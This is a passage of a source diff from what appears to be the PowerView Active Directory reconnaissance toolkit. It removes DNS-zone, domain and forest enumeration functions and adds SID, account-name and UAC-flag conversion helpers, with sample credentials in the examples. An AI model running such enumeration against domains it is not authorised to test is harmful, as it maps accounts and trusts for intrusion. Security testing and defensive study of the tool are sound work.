+.PARAMETER Server - $RDataLen = [BitConverter]::ToUInt16($DNSRecord, 0) - $RDataType = [BitConverter]::ToUInt16($DNSRecord, 2) - $UpdatedAtSerial = [BitConverter]::ToUInt32($DNSRecord, 8) +Specifies an Active Directory server (domain controller) to bind to for the translation. - $TTLRaw = $DNSRecord[12..15] - # reverse for big endian - $Null = [array]::Reverse($TTLRaw) - $TTL = [BitConverter]::ToUInt32($TTLRaw, 0) +.PARAMETER Credential - $Age = [BitConverter]::ToUInt32($DNSRecord, 20) - if($Age -ne 0) { - $TimeStamp = ((Get-Date -Year 1601 -Month 1 -Day 1 -Hour 0 -Minute 0 -Second 0).AddHours($age)).ToString() - } - else { - $TimeStamp = "[static]" - } +Specifies an alternate credential to use for the translation. - $DNSRecordObject = New-Object PSObject +.EXAMPLE - if($RDataType -eq 1) { - $IP = "{0}.{1}.{2}.{3}" -f $DNSRecord[24], $DNSRecord[25], $DNSRecord[26], $DNSRecord[27] - $Data = $IP - $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'A' - } +ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 - elseif($RDataType -eq 2) { - $NSName = Get-Name $DNSRecord[24..$DNSRecord.length] - $Data = $NSName - $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'NS' - } +TESTLAB\harmj0y - elseif($RDataType -eq 5) { - $Alias = Get-Name $DNSRecord[24..$DNSRecord.length] - $Data = $Alias - $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'CNAME' - } +.EXAMPLE - elseif($RDataType -eq 6) { - # TODO: how to implement properly? nested object? - $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) - $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SOA' - } +"S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID - elseif($RDataType -eq 12) { - $Ptr = Get-Name $DNSRecord[24..$DNSRecord.length] - $Data = $Ptr - $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'PTR' - } +TESTLAB\WINDOWS2$ +TESTLAB\harmj0y +BUILTIN\Distributed COM Users - elseif($RDataType -eq 13) { - # TODO: how to implement properly? nested object? - $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) - $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'HINFO' - } +.EXAMPLE - elseif($RDataType -eq 15) { - # TODO: how to implement properly? nested object? - $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) - $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'MX' - } +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred - elseif($RDataType -eq 16) { +TESTLAB\harmj0y - [string]$TXT = "" - [int]$SegmentLength = $DNSRecord[24] - $Index = 25 - while ($SegmentLength-- -gt 0) { - $TXT += [char]$DNSRecord[$index++] - } +.INPUTS - $Data = $TXT - $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'TXT' - } +String - elseif($RDataType -eq 28) { - # TODO: how to implement properly? nested object? - $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) - $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'AAAA' - } +Accepts one or more SID strings on the pipeline. - elseif($RDataType -eq 33) { - # TODO: how to implement properly? nested object? - $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) - $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SRV' - } +.OUTPUTS - else { - $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) - $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'UNKNOWN' - } +String - $DNSRecordObject | Add-Member Noteproperty 'UpdatedAtSerial' $UpdatedAtSerial - $DNSRecordObject | Add-Member Noteproperty 'TTL' $TTL - $DNSRecordObject | Add-Member Noteproperty 'Age' $Age - $DNSRecordObject | Add-Member Noteproperty 'TimeStamp' $TimeStamp - $DNSRecordObject | Add-Member Noteproperty 'Data' $Data - $DNSRecordObject -} +The converted DOMAIN\username. +#> + [OutputType([String])] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('SID')] + [ValidatePattern('^S-1-.*')] + [String[]] + $ObjectSid, -filter Get-DNSZone { -<# - .SYNOPSIS - - Enumerates the Active Directory DNS zones for a given domain. - - .PARAMETER Domain - - The domain to query for zones, defaults to the current domain. - - .PARAMETER DomainController - - Domain controller to reflect LDAP queries through. - - .PARAMETER PageSize - - The PageSize to set for the LDAP searcher object. - - .PARAMETER Credential + [ValidateNotNullOrEmpty()] + [String] + $Domain, - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, - .PARAMETER FullData + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - Switch. Return full computer objects instead of just system names (the default). + BEGIN { + $ADNameArguments = @{} + if ($PSBoundParameters['Domain']) { $ADNameArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential } + } - .EXAMPLE + PROCESS { + ForEach ($TargetSid in $ObjectSid) { + $TargetSid = $TargetSid.trim('*') + try { + # try to resolve any built-in SIDs first - https://support.microsoft.com/en-us/kb/243330 + Switch ($TargetSid) { + 'S-1-0' { 'Null Authority' } + 'S-1-0-0' { 'Nobody' } + 'S-1-1' { 'World Authority' } + 'S-1-1-0' { 'Everyone' } + 'S-1-2' { 'Local Authority' } + 'S-1-2-0' { 'Local' } + 'S-1-2-1' { 'Console Logon ' } + 'S-1-3' { 'Creator Authority' } + 'S-1-3-0' { 'Creator Owner' } + 'S-1-3-1' { 'Creator Group' } + 'S-1-3-2' { 'Creator Owner Server' } + 'S-1-3-3' { 'Creator Group Server' } + 'S-1-3-4' { 'Owner Rights' } + 'S-1-4' { 'Non-unique Authority' } + 'S-1-5' { 'NT Authority' } + 'S-1-5-1' { 'Dialup' } + 'S-1-5-2' { 'Network' } + 'S-1-5-3' { 'Batch' } + 'S-1-5-4' { 'Interactive' } + 'S-1-5-6' { 'Service' } + 'S-1-5-7' { 'Anonymous' } + 'S-1-5-8' { 'Proxy' } + 'S-1-5-9' { 'Enterprise Domain Controllers' } + 'S-1-5-10' { 'Principal Self' } + 'S-1-5-11' { 'Authenticated Users' } + 'S-1-5-12' { 'Restricted Code' } + 'S-1-5-13' { 'Terminal Server Users' } + 'S-1-5-14' { 'Remote Interactive Logon' } + 'S-1-5-15' { 'This Organization ' } + 'S-1-5-17' { 'This Organization ' } + 'S-1-5-18' { 'Local System' } + 'S-1-5-19' { 'NT Authority' } + 'S-1-5-20' { 'NT Authority' } + 'S-1-5-80-0' { 'All Services ' } + 'S-1-5-32-544' { 'BUILTIN\Administrators' } + 'S-1-5-32-545' { 'BUILTIN\Users' } + 'S-1-5-32-546' { 'BUILTIN\Guests' } + 'S-1-5-32-547' { 'BUILTIN\Power Users' } + 'S-1-5-32-548' { 'BUILTIN\Account Operators' } + 'S-1-5-32-549' { 'BUILTIN\Server Operators' } + 'S-1-5-32-550' { 'BUILTIN\Print Operators' } + 'S-1-5-32-551' { 'BUILTIN\Backup Operators' } + 'S-1-5-32-552' { 'BUILTIN\Replicators' } + 'S-1-5-32-554' { 'BUILTIN\Pre-Windows 2000 Compatible Access' } + 'S-1-5-32-555' { 'BUILTIN\Remote Desktop Users' } + 'S-1-5-32-556' { 'BUILTIN\Network Configuration Operators' } + 'S-1-5-32-557' { 'BUILTIN\Incoming Forest Trust Builders' } + 'S-1-5-32-558' { 'BUILTIN\Performance Monitor Users' } + 'S-1-5-32-559' { 'BUILTIN\Performance Log Users' } + 'S-1-5-32-560' { 'BUILTIN\Windows Authorization Access Group' } + 'S-1-5-32-561' { 'BUILTIN\Terminal Server License Servers' } + 'S-1-5-32-562' { 'BUILTIN\Distributed COM Users' } + 'S-1-5-32-569' { 'BUILTIN\Cryptographic Operators' } + 'S-1-5-32-573' { 'BUILTIN\Event Log Readers' } + 'S-1-5-32-574' { 'BUILTIN\Certificate Service DCOM Access' } + 'S-1-5-32-575' { 'BUILTIN\RDS Remote Access Servers' } + 'S-1-5-32-576' { 'BUILTIN\RDS Endpoint Servers' } + 'S-1-5-32-577' { 'BUILTIN\RDS Management Servers' } + 'S-1-5-32-578' { 'BUILTIN\Hyper-V Administrators' } + 'S-1-5-32-579' { 'BUILTIN\Access Control Assistance Operators' } + 'S-1-5-32-580' { 'BUILTIN\Access Control Assistance Operators' } + Default { + Convert-ADName -Identity $TargetSid @ADNameArguments + } + } + } + catch { + Write-Verbose "[ConvertFrom-SID] Error converting SID '$TargetSid' : $_" + } + } + } +} - PS C:\> Get-DNSZone - Retrieves the DNS zones for the current domain. +function Convert-ADName { +<# +.SYNOPSIS - .EXAMPLE +Converts Active Directory object names between a variety of formats. - PS C:\> Get-DNSZone -Domain dev.testlab.local -DomainController primary.testlab.local +Author: Bill Stewart, Pasquale Lantella +Modifications: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - Retrieves the DNS zones for the dev.testlab.local domain, reflecting the LDAP queries - through the primary.testlab.local domain controller. -#> +.DESCRIPTION - param( - [Parameter(Position=0, ValueFromPipeline=$True)] - [String] - $Domain, +This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK) +and translates Active Directory names between various formats using the NameTranslate COM object. - [String] - $DomainController, +.PARAMETER Identity - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, +Specifies the Active Directory object name to translate, of the following form: - [Management.Automation.PSCredential] - $Credential, + DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com' + Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn' + NT4 domain\username; e.g., 'fabrikam\pflynn' + Display display name, e.g. 'pflynn' + DomainSimple simple domain name format, e.g. 'pflynn@fabrikam.com' + EnterpriseSimple simple enterprise name format, e.g. 'pflynn@fabrikam.com' + GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}' + UPN user principal name; e.g., 'pflynn@fabrikam.com' + CanonicalEx extended canonical name format + SPN service principal name format; e.g. 'HTTP/kairomac.contoso.com' + SID Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999' - [Switch] - $FullData - ) +.PARAMETER OutputType - $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential - $DNSSearcher.filter="(objectClass=dnsZone)" +Specifies the output name type you want to convert to, which must be one of the following: - if($DNSSearcher) { - $Results = $DNSSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - # convert/process the LDAP fields for each result - $Properties = Convert-LDAPProperty -Properties $_.Properties - $Properties | Add-Member NoteProperty 'ZoneName' $Properties.name + DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com' + Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn' + NT4 domain\username; e.g., 'fabrikam\pflynn' + Display display name, e.g. 'pflynn' + DomainSimple simple domain name format, e.g. 'pflynn@fabrikam.com' + EnterpriseSimple simple enterprise name format, e.g. 'pflynn@fabrikam.com' + GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}' + UPN user principal name; e.g., 'pflynn@fabrikam.com' + CanonicalEx extended canonical name format, e.g. 'fabrikam.com/Users/Phineas Flynn' + SPN service principal name format; e.g. 'HTTP/kairomac.contoso.com' - if ($FullData) { - $Properties - } - else { - $Properties | Select-Object ZoneName,distinguishedname,whencreated,whenchanged - } - } - $Results.dispose() - $DNSSearcher.dispose() - } +.PARAMETER Domain - $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential -ADSprefix "CN=MicrosoftDNS,DC=DomainDnsZones" - $DNSSearcher.filter="(objectClass=dnsZone)" +Specifies the domain to use for the translation, defaults to the current domain. - if($DNSSearcher) { - $Results = $DNSSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - # convert/process the LDAP fields for each result - $Properties = Convert-LDAPProperty -Properties $_.Properties - $Properties | Add-Member NoteProperty 'ZoneName' $Properties.name +.PARAMETER Server - if ($FullData) { - $Properties - } - else { - $Properties | Select-Object ZoneName,distinguishedname,whencreated,whenchanged - } - } - $Results.dispose() - $DNSSearcher.dispose() - } -} +Specifies an Active Directory server (domain controller) to bind to for the translation. +.PARAMETER Credential -filter Get-DNSRecord { -<# - .SYNOPSIS +Specifies an alternate credential to use for the translation. - Enumerates the Active Directory DNS records for a given zone. +.EXAMPLE - .PARAMETER ZoneName +Convert-ADName -Identity "TESTLAB\harmj0y" - The zone to query for records (which can be enumearted with Get-DNSZone). Required. +harmj0y@testlab.local - .PARAMETER Domain +.EXAMPLE - The domain to query for zones, defaults to the current domain. +"TESTLAB\krbtgt", "CN=Administrator,CN=Users,DC=testlab,DC=local" | Convert-ADName -OutputType Canonical - .PARAMETER DomainController +testlab.local/Users/krbtgt +testlab.local/Users/Administrator - Domain controller to reflect LDAP queries through. +.EXAMPLE - .PARAMETER PageSize +Convert-ADName -OutputType dn -Identity 'TESTLAB\harmj0y' -Server PRIMARY.testlab.local - The PageSize to set for the LDAP searcher object. +CN=harmj0y,CN=Users,DC=testlab,DC=local - .PARAMETER Credential +.EXAMPLE - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred - .EXAMPLE +TESTLAB\harmj0y - PS C:\> Get-DNSRecord -ZoneName testlab.local +.INPUTS - Retrieve all records for the testlab.local zone. +String - .EXAMPLE +Accepts one or more objects name strings on the pipeline. - PS C:\> Get-DNSZone | Get-DNSRecord +.OUTPUTS - Retrieve all records for all zones in the current domain. +String - .EXAMPLE +Outputs a string representing the converted name. - PS C:\> Get-DNSZone -Domain dev.testlab.local | Get-DNSRecord -Domain dev.testlab.local +.LINK - Retrieve all records for all zones in the dev.testlab.local domain. +http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats +https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67 #> - param( - [Parameter(Position=0, ValueFromPipelineByPropertyName=$True, Mandatory=$True)] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [OutputType([String])] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name', 'ObjectName')] + [String[]] + $Identity, + [String] - $ZoneName, + [ValidateSet('DN', 'Canonical', 'NT4', 'Display', 'DomainSimple', 'EnterpriseSimple', 'GUID', 'Unknown', 'UPN', 'CanonicalEx', 'SPN')] + $OutputType, + [ValidateNotNullOrEmpty()] [String] $Domain, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - $DomainController, - - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, + $Server, [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential -ADSprefix "DC=$($ZoneName),CN=MicrosoftDNS,DC=DomainDnsZones" - $DNSSearcher.filter="(objectClass=dnsNode)" + BEGIN { + $NameTypes = @{ + 'DN' = 1 # CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com + 'Canonical' = 2 # fabrikam.com/Engineers/Phineas Flynn + 'NT4' = 3 # fabrikam\pflynn + 'Display' = 4 # pflynn + 'DomainSimple' = 5 # pflynn@fabrikam.com + 'EnterpriseSimple' = 6 # pflynn@fabrikam.com + 'GUID' = 7 # {95ee9fff-3436-11d1-b2b0-d15ae3ac8436} + 'Unknown' = 8 # unknown type - let the server do translation + 'UPN' = 9 # pflynn@fabrikam.com + 'CanonicalEx' = 10 # fabrikam.com/Users/Phineas Flynn + 'SPN' = 11 # HTTP/kairomac.contoso.com + 'SID' = 12 # S-1-5-21-12986231-600641547-709122288-57999 + } - if($DNSSearcher) { - $Results = $DNSSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - try { - # convert/process the LDAP fields for each result - $Properties = Convert-LDAPProperty -Properties $_.Properties | Select-Object name,distinguishedname,dnsrecord,whencreated,whenchanged - $Properties | Add-Member NoteProperty 'ZoneName' $ZoneName + # accessor functions from Bill Stewart to simplify calls to NameTranslate + function Invoke-Method([__ComObject] $Object, [String] $Method, $Parameters) { + $Output = $Null + $Output = $Object.GetType().InvokeMember($Method, 'InvokeMethod', $NULL, $Object, $Parameters) + Write-Output $Output + } + + function Get-Property([__ComObject] $Object, [String] $Property) { + $Object.GetType().InvokeMember($Property, 'GetProperty', $NULL, $Object, $NULL) + } + + function Set-Property([__ComObject] $Object, [String] $Property, $Parameters) { + [Void] $Object.GetType().InvokeMember($Property, 'SetProperty', $NULL, $Object, $Parameters) + } + + # https://msdn.microsoft.com/en-us/library/aa772266%28v=vs.85%29.aspx + if ($PSBoundParameters['Server']) { + $ADSInitType = 2 + $InitName = $Server + } + elseif ($PSBoundParameters['Domain']) { + $ADSInitType = 1 + $InitName = $Domain + } + elseif ($PSBoundParameters['Credential']) { + $Cred = $Credential.GetNetworkCredential() + $ADSInitType = 1 + $InitName = $Cred.Domain + } + else { + # if no domain or server is specified, default to GC initialization + $ADSInitType = 3 + $InitName = $Null + } + } - # convert the record and extract the properties - if ($Properties.dnsrecord -is [System.DirectoryServices.ResultPropertyValueCollection]) { - # TODO: handle multiple nested records properly? - $Record = Convert-DNSRecord -DNSRecord $Properties.dnsrecord[0] + PROCESS { + ForEach ($TargetIdentity in $Identity) { + if (-not $PSBoundParameters['OutputType']) { + if ($TargetIdentity -match "^[A-Za-z]+\\[A-Za-z ]+") { + $ADSOutputType = $NameTypes['DomainSimple'] } else { - $Record = Convert-DNSRecord -DNSRecord $Properties.dnsrecord + $ADSOutputType = $NameTypes['NT4'] } + } + else { + $ADSOutputType = $NameTypes[$OutputType] + } - if($Record) { - $Record.psobject.properties | ForEach-Object { - $Properties | Add-Member NoteProperty $_.Name $_.Value - } + $Translate = New-Object -ComObject NameTranslate + + if ($PSBoundParameters['Credential']) { + try { + $Cred = $Credential.GetNetworkCredential() + + Invoke-Method $Translate 'InitEx' ( + $ADSInitType, + $InitName, + $Cred.UserName, + $Cred.Domain, + $Cred.Password + ) + } + catch { + Write-Verbose "[Convert-ADName] Error initializing translation for '$Identity' using alternate credentials : $_" } + } + else { + try { + $Null = Invoke-Method $Translate 'Init' ( + $ADSInitType, + $InitName + ) + } + catch { + Write-Verbose "[Convert-ADName] Error initializing translation for '$Identity' : $_" + } + } + + # always chase all referrals + Set-Property $Translate 'ChaseReferral' (0x60) - $Properties + try { + # 8 = Unknown name type -> let the server do the work for us + $Null = Invoke-Method $Translate 'Set' (8, $TargetIdentity) + Invoke-Method $Translate 'Get' ($ADSOutputType) } - catch { - Write-Warning "ERROR: $_" - $Properties + catch [System.Management.Automation.MethodInvocationException] { + Write-Verbose "[Convert-ADName] Error translating '$TargetIdentity' : $($_.Exception.InnerException.Message)" } } - $Results.dispose() - $DNSSearcher.dispose() } } -filter Get-NetDomain { +function ConvertFrom-UACValue { <# - .SYNOPSIS +.SYNOPSIS - Returns a given domain object. +Converts a UAC int value to human readable form. - .PARAMETER Domain +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - The domain name to query for, defaults to the current domain. +.DESCRIPTION - .PARAMETER Credential +This function will take an integer that represents a User Account +Control (UAC) binary blob and will covert it to an ordered +dictionary with each bitwise value broken out. By default only values +set are displayed- the -ShowAll switch will display all values with +a + next to the ones set. - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +.PARAMETER Value - .EXAMPLE +Specifies the integer UAC value to convert. - PS C:\> Get-NetDomain -Domain testlab.local +.PARAMETER ShowAll - .EXAMPLE +Switch. Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set. - PS C:\> "testlab.local" | Get-NetDomain +.EXAMPLE - .LINK +ConvertFrom-UACValue -Value 66176 - http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG -#> +Name Value +---- ----- +ENCRYPTED_TEXT_PWD_ALLOWED 128 +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 - param( - [Parameter(ValueFromPipeline=$True)] - [String] - $Domain, +.EXAMPLE - [Management.Automation.PSCredential] - $Credential - ) +Get-DomainUser harmj0y | ConvertFrom-UACValue - if($Credential) { - - Write-Verbose "Using alternate credentials for Get-NetDomain" +Name Value +---- ----- +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 - if(!$Domain) { - # if no domain is supplied, extract the logon domain from the PSCredential passed - $Domain = $Credential.GetNetworkCredential().Domain - Write-Verbose "Extracted domain '$Domain' from -Credential" - } - - $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain, $Credential.UserName, $Credential.GetNetworkCredential().Password) - - try { - [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) - } - catch { - Write-Verbose "The specified domain does '$Domain' not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid." - $Null - } - } - elseif($Domain) { - $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain) - try { - [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) - } - catch { - Write-Verbose "The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust." - $Null - } - } - else { - [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() - } -} +.EXAMPLE +Get-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll -filter Get-NetForest { -<# - .SYNOPSIS +Name Value +---- ----- +SCRIPT 1 +ACCOUNTDISABLE 2 +HOMEDIR_REQUIRED 8 +LOCKOUT 16 +PASSWD_NOTREQD 32 +PASSWD_CANT_CHANGE 64 +ENCRYPTED_TEXT_PWD_ALLOWED 128 +TEMP_DUPLICATE_ACCOUNT 256 +NORMAL_ACCOUNT 512+ +INTERDOMAIN_TRUST_ACCOUNT 2048 +WORKSTATION_TRUST_ACCOUNT 4096 +SERVER_TRUST_ACCOUNT 8192 +DONT_EXPIRE_PASSWORD 65536+ +MNS_LOGON_ACCOUNT 131072 +SMARTCARD_REQUIRED 262144 +TRUSTED_FOR_DELEGATION 524288 +NOT_DELEGATED 1048576 +USE_DES_KEY_ONLY 2097152 +DONT_REQ_PREAUTH 4194304 +PASSWORD_EXPIRED 8388608 +TRUSTED_TO_AUTH_FOR_DELEGATION 16777216 +PARTIAL_SECRETS_ACCOUNT 67108864 - Returns a given forest object. +.INPUTS - .PARAMETER Forest +Int - The forest name to query for, defaults to the current domain. +Accepts an integer representing a UAC binary blob. - .PARAMETER Credential +.OUTPUTS - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +System.Collections.Specialized.OrderedDictionary - .EXAMPLE - - PS C:\> Get-NetForest -Forest external.domain +An ordered dictionary with the converted UAC fields. - .EXAMPLE - - PS C:\> "external.domain" | Get-NetForest +.LINK + +https://support.microsoft.com/en-us/kb/305144 #> - param( - [Parameter(ValueFromPipeline=$True)] - [String] - $Forest, + [OutputType('System.Collections.Specialized.OrderedDictionary')] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('UAC', 'useraccountcontrol')] + [Int] + $Value, - [Management.Automation.PSCredential] - $Credential + [Switch] + $ShowAll ) - if($Credential) { - - Write-Verbose "Using alternate credentials for Get-NetForest" - - if(!$Forest) { - # if no domain is supplied, extract the logon domain from the PSCredential passed - $Forest = $Credential.GetNetworkCredential().Domain - Write-Verbose "Extracted domain '$Forest' from -Credential" - } - - $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest, $Credential.UserName, $Credential.GetNetworkCredential().Password) - - try { - $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext) - } - catch { - Write-Verbose "The specified forest '$Forest' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid." - $Null - } + BEGIN { + # values from https://support.microsoft.com/en-us/kb/305144 + $UACValues = New-Object System.Collections.Specialized.OrderedDictionary + $UACValues.Add("SCRIPT", 1) + $UACValues.Add("ACCOUNTDISABLE", 2) + $UACValues.Add("HOMEDIR_REQUIRED", 8) + $UACValues.Add("LOCKOUT", 16) + $UACValues.Add("PASSWD_NOTREQD", 32) + $UACValues.Add("PASSWD_CANT_CHANGE", 64) + $UACValues.Add("ENCRYPTED_TEXT_PWD_ALLOWED", 128) + $UACValues.Add("TEMP_DUPLICATE_ACCOUNT", 256) + $UACValues.Add("NORMAL_ACCOUNT", 512) + $UACValues.Add("INTERDOMAIN_TRUST_ACCOUNT", 2048) + $UACValues.Add("WORKSTATION_TRUST_ACCOUNT", 4096) + $UACValues.Add("SERVER_TRUST_ACCOUNT", 8192) + $UACValues.Add("DONT_EXPIRE_PASSWORD", 65536) + $UACValues.Add("MNS_LOGON_ACCOUNT", 131072) + $UACValues.Add("SMARTCARD_REQUIRED", 262144) + $UACValues.Add("TRUSTED_FOR_DELEGATION", 524288) + $UACValues.Add("NOT_DELEGATED", 1048576) + $UACValues.Add("USE_DES_KEY_ONLY", 2097152) + $UACValues.Add("DONT_REQ_PREAUTH", 4194304) + $UACValues.Add("PASSWORD_EXPIRED", 8388608) + $UACValues.Add("TRUSTED_TO_AUTH_FOR_DELEGATION", 16777216) + $UACValues.Add("PARTIAL_SECRETS_ACCOUNT", 67108864) } - elseif($Forest) { - $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest) - try { - $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext) + + PROCESS { + $ResultUACValues = New-Object System.Collections.Specialized.OrderedDictionary + + if ($ShowAll) { + ForEach ($UACValue in $UACValues.GetEnumerator()) { + if ( ($Value -band $UACValue.Value) -eq $UACValue.Value) { + $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)+") + } + else { + $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)") + } + } } - catch { - Write-Verbose "The specified forest '$Forest' does not exist, could not be contacted, or there isn't an existing trust." - return $Null + else { + ForEach ($UACValue in $UACValues.GetEnumerator()) { + if ( ($Value -band $UACValue.Value) -eq $UACValue.Value) { + $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)") + } + } } - } - else { - # otherwise use the current forest - $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() - } - - if($ForestObject) { - # get the SID of the forest root - $ForestSid = (New-Object System.Security.Principal.NTAccount($ForestObject.RootDomain,"krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value - $Parts = $ForestSid -Split "-" - $ForestSid = $Parts[0..$($Parts.length-2)] -join "-" - $ForestObject | Add-Member NoteProperty 'RootDomainSid' $ForestSid - $ForestObject + $ResultUACValues } } -filter Get-NetForestDomain { +function Get-PrincipalContext { <# - .SYNOPSIS - - Return all domains for a given forest. +.SYNOPSIS - .PARAMETER Forest +Helper to take an Identity and return a DirectoryServices.AccountManagement.PrincipalContext +and simplified identity. - The forest name to query domain for. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - .PARAMETER Credential +.PARAMETER Identity - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202), +or a DOMAIN\username identity. - .EXAMPLE +.PARAMETER Domain - PS C:\> Get-NetForestDomain +Specifies the domain to use to search for user/group principals, defaults to the current domain. - .EXAMPLE +.PARAMETER Credential - PS C:\> Get-NetForestDomain -Forest external.local +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. #> - param( - [Parameter(ValueFromPipeline=$True)] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True)] + [Alias('GroupName', 'GroupIdentity')] [String] - $Forest, - - [Management.Automation.PSCredential] - $Credential - ) - - $ForestObject = Get-NetForest -Forest $Forest -Credential $Credential - - if($ForestObject) { - $ForestObject.Domains - } -} - - -filter Get-NetForestCatalog { -<# - .SYNOPSIS - - Return all global catalogs for a given forest. + $Identity, - .PARAMETER Forest - - The forest name to query domain for. - - .PARAMETER Credential - - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. - - .EXAMPLE - - PS C:\> Get-NetForestCatalog -#> - - param( - [Parameter(ValueFromPipeline=$True)] + [ValidateNotNullOrEmpty()] [String] - $Forest, + $Domain, [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + 